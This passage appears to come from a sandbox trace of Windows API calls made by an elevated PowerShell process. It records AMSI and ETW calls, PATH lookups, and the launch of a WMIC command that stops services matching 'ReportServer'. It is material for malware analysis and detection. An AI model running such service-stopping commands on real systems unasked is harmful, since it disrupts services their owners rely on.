[3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.805] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.805] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.806] SetEvent (hEvent=0x990) returned 1 [0279.806] SetEvent (hEvent=0x980) returned 1 [0279.806] SetEvent (hEvent=0x988) returned 1 [0279.806] SetEvent (hEvent=0x98c) returned 1 [0279.806] SetEvent (hEvent=0x9a0) returned 1 [0279.806] SetEvent (hEvent=0x994) returned 1 [0279.806] SetEvent (hEvent=0x998) returned 1 [0279.806] SetEvent (hEvent=0x99c) returned 1 [0279.807] SetEvent (hEvent=0x9a8) returned 1 [0279.807] SetEvent (hEvent=0x9a4) returned 1 [0279.808] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0279.813] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0279.816] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x4618227f, Data2=0x611, Data3=0x4d25, Data4=([0]=0xad, [1]=0xce, [2]=0xe8, [3]=0x6b, [4]=0xdd, [5]=0x9c, [6]=0x2d, [7]=0xb4))) returned 0x0 [0279.816] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=37485089508) returned 1 [0279.816] AmsiOpenSession () returned 0x0 [0279.816] AmsiScanString () returned 0x80070015 [0279.833] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=37486754794) returned 1 [0279.833] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0279.835] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.835] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.835] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.835] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.836] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.836] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.837] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0279.838] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0279.838] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0279.838] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0279.839] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0279.839] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0279.839] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0279.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0279.839] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0279.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0279.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0279.840] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0279.840] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0279.840] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0279.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0279.841] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0279.841] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0279.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0279.841] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0279.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0279.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0279.841] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0279.841] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0279.841] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0279.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0279.842] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0279.842] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0279.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0279.842] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0279.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0279.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0279.842] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0279.842] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0279.842] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0279.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0279.843] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0279.843] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0279.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0279.843] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0279.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0279.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0279.843] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0279.843] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0279.843] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c620 [0279.844] FindNextFileW (in: hFindFile=0x7e1c620, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0279.844] FindClose (in: hFindFile=0x7e1c620 | out: hFindFile=0x7e1c620) returned 1 [0279.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0279.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0279.845] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0279.845] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.845] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.845] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.845] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0279.846] GetConsoleWindow () returned 0x302b8 [0279.850] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0279.851] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0279.851] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0279.852] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0279.852] CoTaskMemFree (pv=0x7e29450) [0279.853] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e07d24 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice", lpProcessInformation=0x4e07d24*(hProcess=0x9e8, hThread=0x9e4, dwProcessId=0x111c, dwThreadId=0x1114)) returned 1 [0279.869] CloseHandle (hObject=0x9e4) returned 1 [0279.869] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0279.870] GetCurrentProcess () returned 0xffffffff [0279.870] GetCurrentProcess () returned 0xffffffff [0279.870] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x9e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x9e4) returned 1 [0279.870] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x9e4, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0282.505] CloseHandle (hObject=0x9e4) returned 1 [0282.506] GetExitCodeProcess (in: hProcess=0x9e8, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0282.506] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0282.519] CloseHandle (hObject=0x9e8) returned 1 [0282.519] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.521] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x56, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.521] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.521] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x54, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.521] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.521] SetEvent (hEvent=0x9c8) returned 1 [0282.522] SetEvent (hEvent=0x9bc) returned 1 [0282.522] SetEvent (hEvent=0x9c0) returned 1 [0282.522] SetEvent (hEvent=0x9c4) returned 1 [0282.522] SetEvent (hEvent=0x9d8) returned 1 [0282.522] SetEvent (hEvent=0x9cc) returned 1 [0282.522] SetEvent (hEvent=0x9d0) returned 1 [0282.522] SetEvent (hEvent=0x9d4) returned 1 [0282.522] SetEvent (hEvent=0x9e0) returned 1 [0282.522] SetEvent (hEvent=0x9dc) returned 1 [0282.523] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0282.528] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0282.531] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xac75510d, Data2=0xa63f, Data3=0x4548, Data4=([0]=0x90, [1]=0x2, [2]=0x42, [3]=0x39, [4]=0x5e, [5]=0xe2, [6]=0xd2, [7]=0xfd))) returned 0x0 [0282.532] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=37756644720) returned 1 [0282.532] AmsiOpenSession () returned 0x0 [0282.532] AmsiScanString () returned 0x80070015 [0282.554] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=37758879275) returned 1 [0282.554] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0282.555] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x5d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.555] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x55, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0282.555] EtwEventActivityIdControl (in: 